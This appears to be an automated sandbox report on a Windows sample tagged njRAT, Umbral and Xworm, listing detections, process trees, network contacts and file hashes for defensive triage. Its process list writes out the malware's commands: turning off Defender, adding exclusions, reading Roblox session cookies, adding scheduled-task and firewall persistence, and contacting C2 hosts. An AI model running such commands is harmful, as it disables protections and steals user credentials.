Malware Analysis Report

2024-10-10 09:55

Sample ID 240711-tmzv9awgkf
Target 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe
SHA256 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed
Tags
njrat umbral xworm hacked evasion execution persistence privilege_escalation rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed

Threat Level: Known bad

The file 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe was found to be: Known bad.

Malicious Activity Summary

Xworm

Umbral

njRAT/Bladabindi

Detect Umbral payload

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Modifies Windows Firewall

Reads user/profile data of web browsers

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Detects videocard installed

Scheduled Task/Job: Scheduled Task

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-11 16:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-11 16:11

Reported

2024-07-11 16:13

Platform

win7-20240704-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Umbral

stealer umbral

Xworm

trojan rat xworm

njRAT/Bladabindi

trojan njrat

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\conhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\conhost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2548 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\Server.exe
PID 2548 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\Server.exe
PID 2548 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\Server.exe
PID 2548 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\3.exe
PID 2548 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\3.exe
PID 2548 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\3.exe
PID 2548 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\msxml6.EXE
PID 2548 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\msxml6.EXE
PID 2548 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\msxml6.EXE
PID 2764 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 2764 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 2764 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 2764 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 2764 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 2764 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 2856 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\Server.exe
PID 2856 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\Server.exe
PID 2856 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\Server.exe
PID 2856 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\Server.exe
PID 2856 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 2856 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 2856 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 2772 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\system32\attrib.exe
PID 2772 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\system32\attrib.exe
PID 2772 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\system32\attrib.exe
PID 2772 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 572 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 572 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 572 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 960 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 960 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 960 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 3056 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Roaming\Server.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 3056 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Roaming\Server.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 3056 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Roaming\Server.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 3056 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Roaming\Server.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 2772 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe

"C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe"

C:\Users\Admin\AppData\Local\Temp\Server.exe

"C:\Users\Admin\AppData\Local\Temp\Server.exe"

C:\Users\Admin\AppData\Local\Temp\3.exe

"C:\Users\Admin\AppData\Local\Temp\3.exe"

C:\Users\Admin\AppData\Local\Temp\msxml6.EXE

"C:\Users\Admin\AppData\Local\Temp\msxml6.EXE"

C:\Users\Admin\AppData\Roaming\3.exe

"C:\Users\Admin\AppData\Roaming\3.exe"

C:\Users\Admin\AppData\Roaming\conhost.exe

"C:\Users\Admin\AppData\Roaming\conhost.exe"

C:\Users\Admin\AppData\Roaming\Server.exe

"C:\Users\Admin\AppData\Roaming\Server.exe"

C:\Users\Admin\AppData\Roaming\conhost.exe

"C:\Users\Admin\AppData\Roaming\conhost.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\3.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\3.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\taskeng.exe

taskeng.exe {6EC83B88-1A77-48E9-A2B9-2CA68F99B8C2} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Ondrive.exe

C:\Users\Admin\AppData\Roaming\Ondrive.exe

C:\Users\Admin\AppData\Roaming\Ondrive.exe

C:\Users\Admin\AppData\Roaming\Ondrive.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.187.195:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 testarosa.duckdns.org udp
DE 158.255.214.24:7110 testarosa.duckdns.org tcp
US 147.185.221.20:49236 tcp
US 147.185.221.20:49236 tcp
US 147.185.221.20:49236 tcp
US 147.185.221.20:49236 tcp
US 147.185.221.20:49236 tcp
US 147.185.221.20:49236 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Server.exe

MD5 f9b08bd21b40a938122b479095b7c70c
SHA1 eb925e3927b83c20d8d24bdab2e587c10d6ac8cd
SHA256 c96cde2e96021c266a202286d644ceb28543d6347e21006d72b29b8a72c505e8
SHA512 fcc5784936b7f85a550883c472b99b5edfa7e5c6fd3872fd806b81c2ce1f195ca34342b230a89456066885579fe55aea46d91074ac08af192fbd04ea158473ee

C:\Users\Admin\AppData\Local\Temp\3.exe

MD5 ed59c6590b199b2ee53eec444322472b
SHA1 6c91f4e2489a9869ab971061fdd67a0eeb1e7007
SHA256 aa4abbb1305525b1703a23521db1e817dfd39f014527c319a16a153d2d9dcb0f
SHA512 7dd903995d2c673a3778c5f4f5006cdf3e177ad9093649e5e953894e49f386049ae1e58103095874f09b91d4e21d963d05f02ea9644ed67dd3054aa10b47ba97

C:\Users\Admin\AppData\Roaming\conhost.exe

MD5 b37dd1a1f0507baf993471ae1b7a314c
SHA1 9aff9d71492ffff8d51f8e8d67f5770755899882
SHA256 e58e8918a443c0061add029f8f211f6551a130202195cc2b9b529ea72553e0bc
SHA512 ac76d5b10540eb292341f30c7abfd81f03be65f6655c814aba6ac6a0ecf4f0f2c34c3b8e63ceef8c4579f98b7459e51b9fdd30d601c6d1930860ab7c154da460

\Users\Admin\AppData\Local\Temp\msxml6.EXE

MD5 8b39a0c9d351c316ae38251db3e917da
SHA1 71c988393af62584e93ebe721a600c1a51fa7c29
SHA256 aacbefe172556a5df9e5bf52834aaa22893002edeb46533e1a85866cc7462a15
SHA512 092f06c5f373a65be4f4784357596422df1bb50dcd81c0056464c70f99a0845d71e6819f01c8e7a2ca3f663ad4125588b6e48d88ec0736e7305a70bd8c59e9af

C:\Users\Admin\AppData\Roaming\3.exe

MD5 66d7e8125484efe9585adf807f3860ec
SHA1 aad54a84cc6bfcd422631bfce7b187b001ec0128
SHA256 9cc7b63b2a2c95cfdd1f0f9044f6f760d8dae0d622aa07cb18ce071d9c491d4e
SHA512 f0eabf14bab037689568dc6f7bb6126d1c5922e08432b650e338567c7ae2d70d1ac3420dfec0501453a0e8fece11482071434137e70d62e1136dd482a791d5d5

C:\Users\Admin\AppData\Roaming\Server.exe

MD5 32fe01ccb93b0233503d0aaaa451f7b2
SHA1 58e5a63142150e8fb175dbb4dedea2ce405d7db0
SHA256 6988ee719a54c93a89303dcff277c62ae4890274cc45f074bc7effde315fbf43
SHA512 76945f23a49d594e325d80ffc0570341044ac0b97bd889c92f90bc56d3cdff5c1b29178be4f157c8c1bb9ce7cc311765309f2e6f7b08b24e7acf983ea67635a6

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 4b44d6a9b4157f7e5c708027e8cf5f03
SHA1 90a97073b014839b7301ffed9354cdba378d0bec
SHA256 f97f709534e5ddee9e2d277041059685f562fa1da7b4ef82711aa8d5d2ce3ec3
SHA512 20f972d6126e7ae251926404e871a73ef71e4eeed6c6ca2d8b431a61e1b0fb502a0f7d9ff8666c0bacea8cda97bd2494038b069a790fc4ad72051be7b21425c2

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-11 16:11

Reported

2024-07-11 16:13

Platform

win10v2004-20240704-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Umbral

stealer umbral

Xworm

trojan rat xworm

njRAT/Bladabindi

trojan njrat

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
